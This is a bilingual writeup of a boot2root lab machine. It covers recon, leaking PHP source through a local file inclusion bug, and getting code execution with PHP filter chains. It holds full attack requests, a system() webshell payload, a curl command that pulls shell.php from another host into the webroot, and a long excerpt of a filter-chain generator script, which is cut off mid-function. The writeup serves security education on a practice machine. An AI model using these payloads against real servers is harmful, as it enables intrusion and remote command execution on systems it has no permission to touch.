Offensive Security Lab Japan Boot2Root offsec-4-diveintoive Writeup by Yunolay (LFI2RCE via PHP Filters, RFI)
Introduce 介绍
I’m new to trying Boot2Root and was provided with a vulnerable machine, but it’s mixed in with my home network and I haven’t been able to come up with a solution for accessing the machine.
我是尝试 Boot2Root 的新手,并且提供了一台易受攻击的机器,但它与我的家庭网络混合在一起,我无法提出访问机器的解决方案。
When I received support, I needed to assign a static IP address to the virtual machine and separate LAN segments to configure a closed network.
当我获得支持时,我需要为虚拟机分配一个静态 IP 地址,并分隔 LAN 段以配置封闭网络。
Overview 概述
I set up the virtual machine in question and confirmed that it was configured with Ubuntu.
我设置了有问题的虚拟机,并确认它配置了 Ubuntu。
At this point, I also found out that User is “offsec”.
在这一点上,我还发现用户是“offsec”。
Nmap Scan Nmap 扫描
I first scanned it normally with nmap.
我首先用 nmap 正常扫描它。
$ nmap -sCV -p- --min-rate 5000 192.168.1.4
...
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 be:13:8f:f9:14:25:37:5c:e5:b8:5d:45:4a:bb:35:94 (ECDSA)
|_ 256 ac:96:18:49:40:5e:f6:9f:54:b2:6a:13:54:58:37:3c (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
...Among these, the target that could be considered for an attack is Apache running on Port 80.
其中,可以考虑攻击的目标是在端口 80 上运行的 Apache。
Web – Port 80 Web – 端口 80
The website was very simple.
该网站非常简单。
If we select APT10 or APT28 from the list, the value will be passed to include.php and the page will be displayed.
如果我们从列表中选择 APT10 或 APT28,则该值将被传递给 include.php 并显示页面。
I did a simple enumeration, but didn’t get anything special.
我做了一个简单的枚举,但没有得到任何特别的东西。
$ gobuster dir -u http://192.168.1.4 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -x .php -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.4
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 276]
/index.php (Status: 200) [Size: 505]
/include.php (Status: 200) [Size: 505]
/.php (Status: 403) [Size: 276]
/server-status (Status: 403) [Size: 276]
Progress: 415286 / 415288 (100.00%)
===============================================================
Finished
===============================================================It was easy to imagine that the file was included internally from the file name include.php and the parameter page that displayed the passed parameters.
很容易想象,该文件是从文件名 include.php 和显示传递参数的参数页面内部包含的。
I first needed to see if there was a basic LFI vulnerability, so I tried reading /etc/passwd.
我首先需要查看是否存在基本的 LFI 漏洞,所以我尝试阅读 /etc/passwd。
It is widely known that SecLists’ LFI-Jhaddix.txt is effective for enumeration using LFI’s Intruder.
众所周知,SecLists的LFI-Jhaddix.txt对于使用LFI的Intruder进行枚举是有效的。
SecLists/Fuzzing/LFI /LFI-Jhaddix.txt
This challenge didn’t go well and I got nothing.
这个挑战并不顺利,我一无所获。
Since I was convinced that file inclusion existed, I decided to try other methods.
由于我确信文件包含存在,因此我决定尝试其他方法。
I tried LFI using wrappers to see if it worked.
我尝试使用包装器进行LFI检查,看看它是否有效。
PayloadsAllTheThings/File Inclusion /README.md
Send a request by specifying “php://filter/read=convert.base64-encode/resource=index” in the page parameter.
通过在页面参数中指定“php://filter/read=convert.base64-encode/resource=index”来发送请求。
Request: 请求:
GET /include.php?page=php://filter/read=convert.base64-encode/resource=index&Submit=Submit HTTP/1.1
Host: 192.168.1.4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.4/
Connection: close
Upgrade-Insecure-Requests: 1
As a result, the source code of index.php was successfully leaked.
结果,index.php的源代码被成功泄露。
Response: 响应:
HTTP/1.1 200 OK
Date: Sat, 28 Oct 2023 18:51:21 GMT
Server: Apache/2.4.52 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 676
Connection: close
Content-Type: text/html; charset=UTF-8
PHA+U2VsZWN0IHRoZSBuYW1lIG9mIEFkdmFuY2VkIFBlcnNpc3RlbnQgVGhyZWF0IChBUFQpIEdyb3VwcyAuLi48L3A+CjxjZW50ZXI+CjxiciAvPjxiciAvPgo8Zm9ybSBpZD0iZm9ybTEiIG5hbWU9ImZvcm0xIiBtZXRob2Q9ImdldCIgYWN0aW9uPSJpbmNsdWRlLnBocCI+CjxjZW50ZXI+Cjx0cj4KPHRkPgogIDxzZWxlY3QgbmFtZT0icGFnZSI+CiAgICAgIDxvcHRpb24gdmFsdWU9IkFQVDEwIj4gQVBUMTAgPC9vcHRpb24+CiAgICAgIDxvcHRpb24gdmFsdWU9IkFQVDI4Ij4gQVBUMjggPC9vcHRpb24+CiAgIDwvc2VsZWN0Pgo8L3RkPgo8L3RyPgo8dHIgc3R5bGU9ImhlaWdodDoxMHB4OyI+PC90cj4KPHRyIHN0eWxlPSJ3aWR0aDoxMDBweDsgdmVydGljYWwtYWxpZ246dG9wOyI+PHRkPjwvdGQ+Cjx0ZD48aW5wdXQgdHlwZT0ic3VibWl0IiBuYW1lPSJTdWJtaXQiIHZhbHVlPSJTdWJtaXQiIC8+PC90ZD4KPC90cj4KPC90YWJsZT4KPC9jZW50ZXI+CjwvZm9ybT4KPC9jZW50ZXI+Cg==
Decrypt base64. 解密 base64。
$ echo PHA+U2VsZWN0IHRoZSBuYW1lIG9mIEFkdmFuY2VkIFBlcnNpc3RlbnQgVGhyZWF0IChBUFQpIEdyb3VwcyAuLi48L3A+CjxjZW50ZXI+CjxiciAvPjxiciAvPgo8Zm9ybSBpZD0iZm9ybTEiIG5hbWU9ImZvcm0xIiBtZXRob2Q9ImdldCIgYWN0aW9uPSJpbmNsdWRlLnBocCI+CjxjZW50ZXI+Cjx0cj4KPHRkPgogIDxzZWxlY3QgbmFtZT0icGFnZSI+CiAgICAgIDxvcHRpb24gdmFsdWU9IkFQVDEwIj4gQVBUMTAgPC9vcHRpb24+CiAgICAgIDxvcHRpb24gdmFsdWU9IkFQVDI4Ij4gQVBUMjggPC9vcHRpb24+CiAgIDwvc2VsZWN0Pgo8L3RkPgo8L3RyPgo8dHIgc3R5bGU9ImhlaWdodDoxMHB4OyI+PC90cj4KPHRyIHN0eWxlPSJ3aWR0aDoxMDBweDsgdmVydGljYWwtYWxpZ246dG9wOyI+PHRkPjwvdGQ+Cjx0ZD48aW5wdXQgdHlwZT0ic3VibWl0IiBuYW1lPSJTdWJtaXQiIHZhbHVlPSJTdWJtaXQiIC8+PC90ZD4KPC90cj4KPC90YWJsZT4KPC9jZW50ZXI+CjwvZm9ybT4KPC9jZW50ZXI+Cg== | base64 -d
<p>Select the name of Advanced Persistent Threat (APT) Groups ...</p>
<center>
<br /><br />
<form id="form1" name="form1" method="get" action="include.php">
<center>
<tr>
<td>
<select name="page">
<option value="APT10"> APT10 </option>
<option value="APT28"> APT28 </option>
</select>
</td>
</tr>
<tr style="height:10px;"></tr>
<tr style="width:100px; vertical-align:top;"><td></td>
<td><input type="submit" name="Submit" value="Submit" /></td>
</tr>
</table>
</center>
</form>
</center>Leak the include.php source code in the same way.
以相同的方式泄露包含.php源代码。
Request: 请求:
GET /include.php?page=php://filter/read=convert.base64-encode/resource=include&Submit=Submit HTTP/1.1
Host: 192.168.1.4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.4/
Connection: close
Upgrade-Insecure-Requests: 1
Response: 响应:
HTTP/1.1 200 OK
Date: Sat, 28 Oct 2023 18:55:21 GMT
Server: Apache/2.4.52 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 184
Connection: close
Content-Type: text/html; charset=UTF-8
PD9waHAgaWYgKGlzc2V0KCRfR0VUWydwYWdlJ10pICkKICAgICAgICAkcGFnZSA9ICRfR0VUWydwYWdlJ10uIi5waHAiOwogICAgICBlbHNlIAogICAgICAgICRwYWdlID0gImluZGV4LnBocCI7CiAgICAgIGluY2x1ZGUoJHBhZ2UpOwo/Pgo=Decrypt base64. When I checked the resulting source code, I found that “.php” was added to the value received in the page parameter. Therefore, it seems that /etc/passwd etc. could not be leaked with simple LFI.
解密 base64。当我检查生成的源代码时,我发现“.php”被添加到页面参数中收到的值中。因此,似乎 /etc/passwd 等不能用简单的 LFI 泄露。
$ echo PD9waHAgaWYgKGlzc2V0KCRfR0VUWydwYWdlJ10pICkKICAgICAgICAkcGFnZSA9ICRfR0VUWydwYWdlJ10uIi5waHAiOwogICAgICBlbHNlIAogICAgICAgICRwYWdlID0gImluZGV4LnBocCI7CiAgICAgIGluY2x1ZGUoJHBhZ2UpOwo/Pgo= | base64 -d
<?php if (isset($_GET['page']) )
$page = $_GET['page'].".php";
else
$page = "index.php";
include($page);
?>I am writing this article the day after I solved the problem, so I don’t know the source of the reference, but I probably used almost the same source code as reference when creating the problem, and explained the vulnerability. I saw an article about it.
我是在解决问题后的第二天写这篇文章的,所以我不知道引用的来源,但我可能在创建问题时使用了几乎相同的源代码作为引用,并解释了漏洞。我看到了一篇关于它的文章。
Anyway, we managed to leak the source. What we need to think about next is not only source code leaks, but also whether this vulnerability can be used to execute arbitrary commands.
无论如何,我们设法泄露了消息来源。我们接下来需要考虑的不仅是源代码泄露,还有这个漏洞是否可以用来执行任意命令。
User – www-data 用户 – www-data
In this scenario, a possible solution for arbitrary command execution is to specify “expect://{command}” in the page parameter. Alternatively, experimenting with options such as specifying “php://input&cmd={command}” in the page parameter for a POST request with a body like “<?php system($_REQUEST[‘cmd’]);?>” is crucial for making it work.
在这种情况下,任意命令执行的可能解决方案是在 page 参数中指定“expect://{command}”。或者,尝试一些选项,例如在 POST 请求的页面参数中指定“php://input&cmd={command}”,其正文类似于“<?php system($_REQUEST[‘cmd’]);?>”,这对于使其正常工作至关重要。
Local File Inclusion (LFI) — Web Application Penetration Testing
本地文件包含 (LFI) — Web 应用程序渗透测试
本地文件包含 (LFI) — Web 应用程序渗透测试
The definitive guide for LFI vulnerability security testing for bug hunting & penetration testing engagements.
LFI 漏洞安全测试的权威指南,用于漏洞搜寻和渗透测试活动。
LFI 漏洞安全测试的权威指南,用于漏洞搜寻和渗透测试活动。
But all these attempts did not work.
但所有这些尝试都没有奏效。
There is also a known method to execute the command with “php://filter/read=convert.base64-encode/resource=expect://curl$IFS’http://192.168.1.100/shell.php’$IFS-O$IFS/var/www/html/shell.php”, but unfortunately it did not work.
还有一种已知的方法来执行带有“php://filter/read=convert.base64-encode/resource=expect://curl$IFS’http://192.168.1.100/shell.php’$IFS-O$IFS/var/www/html/shell.php”的命令,但不幸的是它不起作用。
I tried uploading shell.php using the curl command, but there was no request from the server. I think this is either www-data doesn’t have a curl command or expect doesn’t work.
我尝试使用 curl 命令上传 shell.php,但没有来自服务器的请求。我认为这要么是 www-data 没有 curl 命令,要么是 expect 不起作用。
While searching for a solution, I came across an article.
在寻找解决方案时,我遇到了一篇文章。
PHP filters chain: What is it and how to use it
PHP过滤器链:它是什么以及如何使用它
PHP过滤器链:它是什么以及如何使用它
Searching for new gadget chains to exploit deserialization vulnerabilities can be tedious.
寻找新的小工具链来利用反序列化漏洞可能很乏味。
寻找新的小工具链来利用反序列化漏洞可能很乏味。
I won’t go into the summary because it’s written in this article, but it describes how to perform a small-scale brute force attack to create a php filler chain and execute arbitrary PHP code.
我不会进入摘要,因为它写在这篇文章中,但它描述了如何执行小规模的暴力攻击来创建 php 填充链并执行任意 PHP 代码。
I tried sending a php filter chain payload that executes <?php phpinfo(); ?> that was described as a sample, but it worked and phpinfo was displayed.
我尝试发送一个执行 <?php phpinfo(); ?> 的 php 过滤器链有效负载,它被描述为一个示例,但它有效并显示了 phpinfo。
GET /include.php?page=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp&Submit=Submit HTTP/1.1
Host: 192.168.1.4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.4/
Connection: close
Upgrade-Insecure-Requests: 1
It seems possible to execute arbitrary code by generating a php filiter chain with <?php system($_REQUEST[“cmd”]);?> as the payload.
似乎可以通过生成一个以 <?php system($_REQUEST[“cmd”]);?> 作为有效负载的 php filiter 链来执行任意代码。
This method is also explained on HackTricks.
LFI2RCE via PHP Filters – HackTricks
通过PHP过滤器LFI2RCE – HackTricks
通过PHP过滤器LFI2RCE – HackTricks
$convs = array(’437′, ‘500’, ‘500V1’, ‘850’, ‘851’, ‘852’, ‘855’, ‘856’, ‘857’, ‘858’, ‘860’, ‘861’, ‘862’, ‘863’, ‘864’, ‘865’, ‘866’, ‘866NAV’, ‘869’, ‘874’, ‘904’, ‘1026’, ‘1046’, ‘1047’, ‘8859_1’, ‘8859_2’, ‘8859_3’, ‘8859_4’, ‘8859_5’, ‘8859_6’, ‘8859_7’, ‘8859_8’, ‘8859_9’, ‘10646-1:1993’, ’10…
$convs = array(’437’, ‘500’, ‘500V1’, ‘850’, ‘851’, ‘852’, ‘855’, ‘856’, ‘857’, ‘858’, ‘860’, ‘861’, ‘862’, ‘863’, ‘864’, ‘865’, ‘866’, ‘866NAV’, ‘869’, ‘874’, ‘904’, ‘1026’, ‘1046’, ‘1047’, ‘8859_1’, ‘8859_2’, ‘8859_3’, ‘8859_4’, ‘8859_5’, ‘8859_6’, ‘8859_7’, ‘8859_8’, ‘8859_9’, ‘10646-1:1993’, ’10…
$convs = array(’437’, ‘500’, ‘500V1’, ‘850’, ‘851’, ‘852’, ‘855’, ‘856’, ‘857’, ‘858’, ‘860’, ‘861’, ‘862’, ‘863’, ‘864’, ‘865’, ‘866’, ‘866NAV’, ‘869’, ‘874’, ‘904’, ‘1026’, ‘1046’, ‘1047’, ‘8859_1’, ‘8859_2’, ‘8859_3’, ‘8859_4’, ‘8859_5’, ‘8859_6’, ‘8859_7’, ‘8859_8’, ‘8859_9’, ‘10646-1:1993’, ’10…
This writeup explains that we can use php filters to generate arbitrary content as output. Which basically means that we can generate arbitrary php code for the include without needing to write it into a file.
这篇文章解释说,我们可以使用 php 过滤器来生成任意内容作为输出。这基本上意味着我们可以为包含生成任意的 php 代码,而无需将其写入文件。
Solving “includer’s revenge” from hxp ctf 2021 without controlling any files
在不控制任何文件的情况下解决 hxp ctf 2021 中的“includer’s revenge”
在不控制任何文件的情况下解决 hxp ctf 2021 中的“includer’s revenge”
Solving “includer’s revenge” from hxp ctf 2021 without controlling any files – writeup.md
在不控制任何文件的情况下解决 hxp ctf 2021 中的“includer’s revenge” – writeup.md
在不控制任何文件的情况下解决 hxp ctf 2021 中的“includer’s revenge” – writeup.md
Just running the script that was on HackTricks didn’t work. However, when I used the tool “php_filter_chain_generator” introduced on HackTricks, it worked.
仅仅运行HackTricks上的脚本是行不通的。但是,当我使用 HackTricks 上介绍的“php_filter_chain_generator”工具时,它起作用了。
GitHub – synacktiv/php_filter_chain_generator
Contribute to synacktiv/php_filter_chain_generator development by creating an account on GitHub.
通过在 GitHub 上创建帐户,为 synacktiv/php_filter_chain_generator 开发做出贡献。
通过在 GitHub 上创建帐户,为 synacktiv/php_filter_chain_generator 开发做出贡献。
php_filter_chain_generator.py
#!/usr/bin/env python3
import argparse
import base64
import re
# - Useful infos -
# https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi2rce-via-php-filters
# https://github.com/wupco/PHP_INCLUDE_TO_SHELL_CHAR_DICT
# https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d
# No need to guess a valid filename anymore
file_to_use = "php://temp"
conversions = {
'0': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2',
'1': 'convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4',
'2': 'convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921',
'3': 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.iconv.IBM868.UTF-16LE',
'4': 'convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE',
'5': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2',
'6': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.CSIBM943.UCS4|convert.iconv.IBM866.UCS-2',
'7': 'convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4',
'8': 'convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
'9': 'convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB',
'A': 'convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213',
'a': 'convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE',
'B': 'convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000',
'b': 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE',
'C': 'convert.iconv.UTF8.CSISO2022KR',
'c': 'convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2',
'D': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213',
'd': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5',
'E': 'convert.iconv.IBM860.UTF16|convert.iconv.ISO-IR-143.ISO2022CNEXT',
'e': 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UTF16.EUC-JP-MS|convert.iconv.ISO-8859-1.ISO_6937',
'F': 'convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB',
'f': 'convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213',
'g': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8',
'G': 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90',
'H': 'convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213',
'h': 'convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE',
'I': 'convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.BIG5.SHIFT_JISX0213',
'i': 'convert.iconv.DEC.UTF-16|convert.iconv.ISO8859-9.ISO_6937-2|convert.iconv.UTF16.GB13000',
'J': 'convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4',
'j': 'convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.iconv.CP950.UTF16',
'K': 'convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE',
'k': 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2',
'L': 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.R9.ISO6937|convert.iconv.OSF00010100.UHC',
'l': 'convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE',
'M':'convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.iconv.UTF16BE.866|convert.iconv.MACUKRAINIAN.WCHAR_T',
'm':'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949',
'N': 'convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4',
'n': 'convert.iconv.ISO88594.UTF16|convert.iconv.IBM5347.UCS4|convert.iconv.UTF32BE.MS936|convert.iconv.OSF00010004.T.61',
'O': 'convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775',
'o': 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-4LE.OSF05010001|convert.iconv.IBM912.UTF-16LE',
'P': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB',
'p': 'convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4',
'q': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.GBK.CP932|convert.iconv.BIG5.UCS2',
'Q': 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500-1983.UCS-2BE|convert.iconv.MIK.UCS2',
'R': 'convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4',
'r': 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.ISO-IR-99.UCS-2BE|convert.iconv.L4.OSF00010101',
'S': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS',
's': 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90',
'T': 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500.L4|convert.iconv.ISO_8859-2.ISO-IR-103',
't': 'convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS',
'U': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943',
'u': 'convert.iconv.CP1162.UTF32|convert.iconv.L4.T.61',
'V': 'convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB',
'v': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.ISO-8859-14.UCS2',
'W': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936',
'w': 'convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE',
'X': 'convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932',
'x': 'convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS',
'Y': 'convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361',
'y': 'convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT',
'Z': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16',
'z': 'convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937',
'/': 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4',
'+': 'convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157',
'=': ''
}
def generate_filter_chain(chain, debug_base64 = False):
encoded_chain = chain
# generate some garbage base64
filters = "convert.iconv.UTF8.CSISO2022KR|"
filters += "convert.base64-encode|"
